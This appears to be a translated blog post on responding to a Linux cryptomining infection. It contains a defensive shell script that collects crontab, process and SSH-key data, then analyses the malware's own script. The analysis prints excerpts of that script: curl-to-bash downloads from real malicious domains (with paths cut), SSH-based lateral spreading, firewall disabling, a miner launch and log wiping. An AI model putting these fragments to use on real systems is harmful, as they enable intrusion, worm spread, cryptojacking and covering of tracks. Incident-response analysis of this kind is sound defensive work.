Preface
The text and pictures in this article are from the Internet and are for learning and communication purposes only. They do not have any commercial use. If you have any questions, please contact us for processing.
PS: If you need Python learning materials, you can click on the link below to get it yourself
Python free learning materials and group communication answers Click to join
background
I dealt with an emergency response some time ago, and I also output an article Linux emergency response notes. In the past two days, we have dealt with a virus intrusion. Based on the previous one, some automated scripts were made for this emergency response. The efficiency of emergency response has been improved to a certain extent, so I made another note.
PS: This article focuses on sharing the emergency response experience. The malicious URL is retained in the article, but the download path of the malicious script and program is deleted. This article is only used for technical discussion and analysis, and is strictly prohibited for any illegal purposes. Violators are responsible for the consequences.
Emergency operation notes
Looking at my last Linux emergency response notes, I found that the list of so many commands is often dazzling and inconvenient to operate. It is better to write a shell script to automatically collect information.
Automated information collection
The script for my automated mobile phone information is as follows. The original intention of the script is to automate information collection without me connecting to the customer’s equipment to improve operation/communication efficiency.
#!/bin/bash
function initial(){
echo "Doing initial"
mkdir /tmp/GatherInfo
chmod +x ./chkrootkit
chmod +x ./busybox
}
function chkrootkit_info(){
echo "Doing chkrootkit"
./chkrootkit > /tmp/GatherInfo/chkrootkit.log 2>&1
}
function network_info(){
echo "Gathering network info"
netstat -tulnp > /tmp/GatherInfo/netstat_tulnp.log 2>&1
netstat -anp > /tmp/GatherInfo/netstat_anp.log 2>&1
}
function process_info(){
echo "Gathering process info"
ps aux > /tmp/GatherInfo/ps_aux.log 2>&1
ps auxef > /tmp/GatherInfo/ps_auxef.log 2>&1
top -n 1 > /tmp/GatherInfo/top_n1.log 2>&1
}
function init_info(){
echo "Gathering init info"
chkconfig --list > /tmp/GatherInfo/chkconfig_list.log 2>&1
ls -alt /etc/init* > /tmp/GatherInfo/ls_alt_etc_init.log 2>&1
}
function cron_info(){
echo "Gathering cron info"
cat /etc/crontab > /tmp/GatherInfo/crontab.log 2>&1
cat /etc/anacrontab > /tmp/GatherInfo/anacrontab.log 2>&1
crontab -l > /tmp/GatherInfo/crontab_l.log 2>&1
cd /etc/cron.d/
cat * > /tmp/GatherInfo/etc_cron.d.log 2>&1
cd /etc/cron.daily/
cat * > /tmp/GatherInfo/etc_daily.log 2>&1
cd /etc/cron.hourly/
cat * > /tmp/GatherInfo/etc_hourly.log 2>&1
cd /etc/cron.monthly/
cat * > /tmp/GatherInfo/etc_monthly.log 2>&1
cd /etc/cron.weekly/
cat * > /tmp/GatherInfo/etc_weekly.log 2>&1
cd /var/spool/cron/
cat * > /tmp/GatherInfo/var_spool_cron.log 2>&1
cd /var/spool/anacron/
cat * > /tmp/GatherInfo/var_spool_anacron.log 2>&1
}
function other_info(){
echo "Gathering other info"
cat /etc/passwd | grep -v nologin > /tmp/GatherInfo/passwd.log 2>&1
ls -alt /tmp > /tmp/GatherInfo/tmp.log 2>&1
ls -alt /var/tmp > /tmp/GatherInfo/var_tmp.log 2>&1
ls -alt /dev/shm > /tmp/GatherInfo/dev_shm.log 2>&1
echo $LD_PRELOAD > /tmp/GatherInfo/LD_PRELOAD.log 2>&1
cat /etc/ld.so.preload > /tmp/GatherInfo/etc_ld.so.preload.log 2>&1
s -alt /root/.ssh > /tmp/GatherInfo/ls_alt_root_.ssh.log 2>&1
cat /root/.ssh/* > /tmp/GatherInfo/cat_root_.ssh.log 2>&1
for user in /home/*
do
if test -d $user;then
cat /$user/.ssh/* > /tmp/GatherInfo/cat_$user_.ssh.log 2>&1
fi
done
}
initial
chkrootkit_info
network_info
process_info
init_info
cron_info
other_info
cd /tmp
tar -zcvf GatherInfo.tar.gz GatherInfo
Analysis of information collection results
View the contents of all files under GatherInfo, the information collected automatically, and sort them out one by one according to the Checklist items below
Emergency Response Checklist
No abnormality was found during the investigation process and the network. When checking the crontab of the timing task, three abnormal timing tasks were found
59 * * * * root (curl -fsSL http://t.amynx.com/ ......
28 * * * * root (curl -fsSL http://t.jdjdcjq.top/ ......
13 * * * * root ps aux|grep lplp.ackng.com ......
I got the malicious script locally, this is a shell script, let’s analyze and see what this script does
Malicious script analysis
The malicious script has 439 lines of code. The first 300 lines are for deleting files and killing processes. I will briefly summarize a few pieces of code.
#/bin/bash
processes(){
killme() {
killall -9 chron-34e2fg;ps wx|awk '/34e|r\/v3|moy5|defunct/' | awk '{print $1}' | xargs kill -9 & > /dev/null &
}
killa() {
what=$1;ps auxw|awk "/$what/" |awk '!/awk/' | awk '{print $2}'|xargs kill -9&>/dev/null&
}
killa 34e2fg
killme
killall \.Historys
killall \.sshd
killall neptune
killall xm64
killall xm32
killall xmrig
killall \.xmrig
killall suppoieup
# sshd
ps ax | grep sshd | grep -v grep | awk '{print $1}' > /tmp/ssdpid
while read sshdpid
do
if [ $(echo $(ps -p $sshdpid -o %cpu | grep -v \%CPU) | sed -e 's/\.[0-9]*//g') -ge 60 ]
then
kill $sshdpid
fi
done < /tmp/ssdpid
rm -f /tmp/ssdpid
# Removing miners by known path IOC
files(){
ulimit -n 65535
rm -rf /var/log/syslog
chattr -iua /tmp/
chattr -iua /var/tmp/
chattr -R -i /var/spool/cron
chattr -i /etc/crontab
ufw disable
iptables -F
echo "nope" >/tmp/log_rot
sudo sysctl kernel.nmi_watchdog=0
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
rm /tmp/.cron
rm /tmp/.main
rm /tmp/.yam* -rf
rm -f /tmp/irq
# Killing and blocking miners by network related IOC
network(){
# Kill by known ports/IPs
netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 185.71.65.238 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
files
processes
network
echo "DONE"
Next is to download malicious binary programs and ssh lateral spread
代码片段1
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'export src=sshcopy;(curl -fsSL http://t.amynx.com/ ......
fi
代码片段2
for file in /home/*
do
if test -d $file; then
if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'export src=sshcopy;(curl -fsSL http://t.amynx.com/ ...... |bash >/dev/null 2>&1 &' & done
fi
fi
done
代码片段3
for user in $userlist; do
for host in $hostlist; do
for key in $keylist; do
for sshp in $sshports; do
i=$((i+1))
if [ "${i}" -eq "20" ]; then
sleep 20
ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
i=0
fi
#Wait 20 seconds after every 20 attempts and clean up hanging processes
chmod +r $key
chmod 400 $key
echo "$user@$host $key $sshp"
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "export src=sshcopy;(curl -fsSL http://t.amynx.com/ ...... |bash >/dev/null 2>&1 &"
done
done
done
done
The above three pieces of code are spread laterally through ssh certificate login.
if [ ! -d "/.Xll" ];then
mkdir /.Xll
fi
cd /.Xll
if [ ! -f "./xr" ];then
uname -a|grep x86_64 && (curl -fsSL d.ackng.com/ ......
fi
uname -a|grep x86_64 && ps aux|grep lplp.ackng.com |grep -v grep || ./xr -o lplp.ackng.com:444 --opencl --donate-level=1 --nicehash -B --http-host=0.0.0.0 --http-port=65529
The above code is to download a malicious binary program, which should be the mining virus body.
Finally, clean up the traces
history -c
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
echo > /root/.bash_history
Clean up and restore
According to the logic of the malicious script, the cleanup steps are as follows: 1 Delete the crontab malicious timing task 2 Kill the ./xr process 3 Delete the /.Xll directory
Summary and reflection
Virus identification
目录及文件 /.Xll 和 /.Xll/xr
进程表示 ps aux | grep lplp.ackng.com
两个域 t.amynx.com, t.jdjdcjq.top
Mining threat is less than blackmail
Every time I encounter a virus intrusion, I have to panic. The mining virus is okay. The worst case is to reinstall the environment. The customer's data is safe. If it is a blackmail virus, it will be very difficult.
In any case, try to ensure system security and reduce the attack surface of system intrusion, which can greatly protect the system from being invaded.
Protection advice
Generally speaking, automated intrusions generally use very simple vulnerabilities, such as passwords, use of vulnerable components, unauthorized access, etc. Another way to infect viruses is ssh certificate authentication. As mentioned above, there are three methods for ssh horizontal propagation, and it seems that this method is still very popular. Therefore, for manufacturers, it is still necessary to properly control ssh certificate login.
Finally, I put the scripts and checklist used above in https://github.com/kafroc/emergency-response-toolbox , readers in need can download and use, welcome any feedback.